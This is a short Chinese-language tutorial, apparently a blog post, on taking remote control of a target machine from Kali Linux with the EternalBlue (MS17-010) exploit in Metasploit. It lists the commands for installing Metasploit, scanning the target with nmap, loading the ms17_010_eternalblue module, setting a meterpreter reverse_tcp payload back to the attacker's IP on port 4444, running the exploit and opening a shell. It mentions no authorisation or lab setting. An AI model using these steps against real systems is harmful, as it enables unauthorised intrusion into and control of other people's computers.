kali通过永恒之蓝漏洞攻击目标机
kali通过永恒之蓝攻击目标机
在Kali Linux中实现目标机器的远程控制通常涉及使用工具如Metasploit。以下是详细步骤:
1. 准备工作
- Kali Linux:确保已安装Kali Linux。
- 目标机器:需有已知漏洞或配置不当的服务。
- 网络连接:确保Kali与目标机器在同一网络或可通过互联网访问。
2. 安装必要工具
安装Metasploit框架:
sudo apt update
sudo apt install metasploit-framework
3. 信息收集
- 扫描目标:
替换sudo nmap -sV -O <目标IP><目标IP>为目标机器的IP地址。
4. 选择漏洞
根据扫描结果选择合适漏洞。例如,若目标运行Windows且有SMB漏洞,可使用永恒之蓝。
5. 配置Metasploit
- 启动Metasploit:
msfconsole - 搜索漏洞利用模块:
search eternalblue - 选择模块:
use exploit/windows/smb/ms17_010_eternalblue - 设置目标IP:
set RHOSTS <目标IP> - 设置Payload:
set payload windows/x64/meterpreter/reverse_tcp - 设置本地IP:
set LHOST <Kali IP> - 设置本地端口:
set LPORT 4444
6. 执行攻击
- 运行漏洞利用:
若成功,将获得Meterpreter会话。exploit
7. 远程控制
- 查看帮助:
help - 执行命令:
sysinfo - 获取Shell:
shell
8. 清理
- 关闭会话:
exit - 退出Metasploit:
exit